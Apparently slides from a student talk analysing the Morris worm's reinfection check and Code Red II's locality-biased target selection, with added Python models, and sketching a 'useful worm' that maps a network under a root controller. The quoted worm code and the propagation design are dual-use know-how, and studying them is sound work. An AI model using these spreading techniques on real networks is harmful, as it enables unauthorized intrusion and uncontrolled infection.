The Worm Works For You
Matt Weaver
CS591
Introduction
The Shockwave Rider
PARC
Town Crier
Vampire
Goal
Use a worm to measure bandwidth and map a network.
Analyze classic worms: Morris, Code Red.
Determine the algorithm and architecture of a “useful worm”
Morris Mistake
Listen on a port: failure leads to infection.
Machines were reinfected.
Morris checkother()

```c
checkother() /* 0x57d0 */
{
    int s, l8, l12, l16, optval;
    struct sockaddr_in sin;         /* 16 bytes */

    optval = 1;
    if ((random() % 7) == 3)
        return;                     /* 612 */
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return;

    /* Make a socket to the localhost, using a link-time specific port */
    bzero(&sin, sizeof(sin));       /* 16 */
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(XS("127.0.0.1"));   /* <other_fd+4> */
    sin.sin_port = 0x00005b3d;      /* ??? */

    if (connect(s, &sin, sizeof(sin)) < 0) {
        close(s);
    } else {
        l8 = MAGIC_2;               /* Magic number??? */
        if (write(s, &l8, sizeof(l8)) != sizeof(l8)) {
            close(s);
            return;
        }
        l8 = 0;
        if (xread(s, &l8, sizeof(l8), 5*60) != sizeof(l8)) {
            close(s);
            return;
        }
        if (l8 != MAGIC_1) {
            close(s);
            return;
        }
        l12 = random()/8;
        if (write(s, &l12, sizeof(l12)) != sizeof(l12)) {
            close(s);
            return;
        }
        if (xread(s, &l16, sizeof(l16), 10) != sizeof(l16)) {
            close(s);
            return;
        }
        if (!((l12+l16) % 2))
            pleasequit++;
        close(s);
    }
    sleep(5);
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return;
    /* Set the socket so that the address may be reused */
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval));
    if (bind(s, &sin, sizeof(sin)) < 0) {
        close(s);
        return;
    }
    listen(s, 10);
    other_fd = s;
    return;
}
```
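The arithmetic behind the "Morris Mistake", as an added Python model (not the worm's code): the check above is skipped outright one time in seven, and when it does run, a parity coin flip decides whether the newcomer backs off. The model assumes the reply `l16` is a random value chosen by the copy already listening, which this excerpt does not show.

```python
import random
from fractions import Fraction

# Constants lifted from checkother() above: `if ((random() % 7) == 3) return;`
SKIP_MODULUS, SKIP_RESIDUE = 7, 3

def new_instance_survives(r_skip, l12, l16, listener_present=True):
    """Does a freshly started copy keep running after checkother()?
    r_skip models the first random() call; l12 is the number this copy sends
    (random()/8 in the original); l16 is the reply from the copy already
    listening on 127.0.0.1 (assumed here to be a random value of its own).
    """
    if r_skip % SKIP_MODULUS == SKIP_RESIDUE:
        return True                 # 1 in 7: the check is skipped outright
    if not listener_present:
        return True                 # connect() fails: nobody to defer to
    if (l12 + l16) % 2 == 0:
        return False                # pleasequit++: this copy backs off
    return True                     # odd parity: both copies keep running
                                    # (a failed bind() later does not exit)

def exact_survival_probability():
    """Exact chance that a duplicate survives on an already infected host:
    P(skip) + P(check) * P(odd parity) = 1/7 + 6/7 * 1/2 = 4/7."""
    total = Fraction(0)
    for r in range(SKIP_MODULUS):          # r_skip mod 7, uniform
        for parity in (0, 1):              # l12 + l16 parity, uniform
            if new_instance_survives(r, parity, 0):
                total += Fraction(1, SKIP_MODULUS) * Fraction(1, 2)
    return total

def expected_copies(reinfection_attempts):
    """Expected live copies on one host: the original plus each later arrival
    that survives the check. With 7 attempts that is 1 + 4 = 5 copies."""
    return 1 + reinfection_attempts * exact_survival_probability()

def simulate(trials=20000, seed=1):
    """Monte Carlo check of the exact figure using 31-bit values like random()."""
    rng = random.Random(seed)
    survived = 0
    for _ in range(trials):
        r_skip, l12, l16 = (rng.getrandbits(31) for _ in range(3))
        survived += new_instance_survives(r_skip, l12 // 8, l16)
    return survived / trials
```

Because more than half of all duplicates survive, the load on a host grows with every re-infection attempt, which is the effect the "Machines were reinfected" slide refers to.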
Code Red II
Mountain Dew
Code Red utilized a clever distribution scheme: not just the random IP trick.
Code Red II (Continued)
```
mtable[] = {
    0xFFFFFFFF,   // go anywhere
    0xFFFFFF00,   // stay in class A
    0xFFFFFF00,   // stay in class A
    0xFFFFFF00,   // stay in class A
    0xFFFFFF00,   // stay in class A
    0xFFFF0000,   // stay in class B
    0xFFFF0000,   // stay in class B
    0xFFFF0000    // stay in class B
};

# start with a random number that will be our new IP address.
# I presume the random number generator is "random enough".
newip = random();

# zero the UPPER octets of the random IP, which means that the
# random number won't participate in the class A or class B
# address
mask  = mtable[ random() & 0x7 ];   // locate a mask
newip &= mask;                      // throw away rightmost bits

# flip the mask around to operate on LOWER octets
mask = ~mask;                       // flip the mask around
myip = LOCAL_IP & mask;             // throw away leftmost bits

# newip contains the upper bits
# myip  contains the lower bits
# join them:
newip |= myip;

if (newip starts with 127) try again   // localhost
if (newip starts with 224) try again   // multicast
if (newip matches LOCAL_IP) try again

Connect to "newip" and try to infect
```
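The locality of that selector, as an added Python model (not the worm's code, nor the analysis it is quoted from): the masks only make sense once you read the address as an x86 little-endian dword, with the first octet in the low byte. The model computes what share of candidate targets land in the infected host's own /8 and /16, which is the share an internal sensor would see. The local address is a constructed sample value.

```python
import random
from ipaddress import IPv4Address

# Mask table from the Code Red II selector above, indexed by random() & 7.
MTABLE = [0xFFFFFFFF,                                         # 1/8: anywhere
          0xFFFFFF00, 0xFFFFFF00, 0xFFFFFF00, 0xFFFFFF00,     # 4/8: same /8
          0xFFFF0000, 0xFFFF0000, 0xFFFF0000]                 # 3/8: same /16

def as_dword(ip):
    """x86 (little-endian) view of an address held in network byte order:
    the first octet lands in the LOW byte, so 0xFFFF0000 keeps random bits in
    octets 3-4 and ~mask selects octets 1-2 of LOCAL_IP. That is why the masks
    read 'backwards' compared with a conventional netmask."""
    return int.from_bytes(IPv4Address(ip).packed, "little")

def from_dword(value):
    return IPv4Address(value.to_bytes(4, "little"))

def combine(random_dword, mask, local_ip):
    """newip &= mask; newip |= LOCAL_IP & ~mask, exactly as in the pseudocode."""
    local = as_dword(local_ip)
    return from_dword((random_dword & mask) | (local & ~mask & 0xFFFFFFFF))

def accept(target, local_ip):
    """The worm's three rejections: loopback, multicast, and itself."""
    target = IPv4Address(target)
    first = target.packed[0]
    return first not in (127, 224) and target != IPv4Address(local_ip)

def locality(local_ip="10.1.2.3", samples=20000, seed=7):
    """Share of accepted candidates inside the local /8 and the local /16.
    Expected about 0.875 and 0.375: most probes stay near the infected host."""
    rng = random.Random(seed)
    local = IPv4Address(local_ip).packed
    same8 = same16 = accepted = 0
    for _ in range(samples):
        newip = rng.getrandbits(32)                 # newip = random()
        mask = MTABLE[rng.getrandbits(32) & 0x7]    # mask = mtable[random() & 7]
        target = combine(newip, mask, local_ip)
        if not accept(target, local_ip):
            continue
        accepted += 1
        p = target.packed
        same8 += p[0] == local[0]
        same16 += p[:2] == local[:2]
    return same8 / accepted, same16 / accepted
```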
A New Worm
[Diagram: a Root machine and four Target machines on a Network]
Logic
Write a text file (C: on Windows, ~ on Unix).
Talk to parent.
Find next machine.
Infect next.
Talk to parent.
Timed death.
Forced death (success).
[Diagram: Parent, Child, Next Target]
Concerns
Running amok / re-infection.
Termination.
The Root Machine
Compiles UDP payload information from child instances.
Maps network.
Dynamically generates viral payload (binary).
Provides control values.
Conclusion
Master’s Project: get it working safely.
Sources
Aleph One. "Smashing the Stack for Fun and Profit". Phrack 49.
CERT. http://www.cert.org/
Eren, Sinan. "Smashing the Kernel Stack for Fun and Profit." Phrack 60.
Erickson, Jon. Hacking: The Art of Exploitation. No Starch Press, 2003.
Morris, Robert. Morris Worm Source Code. http://www.foo.be/docs-free/morris-worm/worm/
Wikipedia, "Computer Worm". http://en.wikipedia.org/wiki/Computer_worm
Friedl, Steve. Unix Wiz. http://www.unixwiz.net/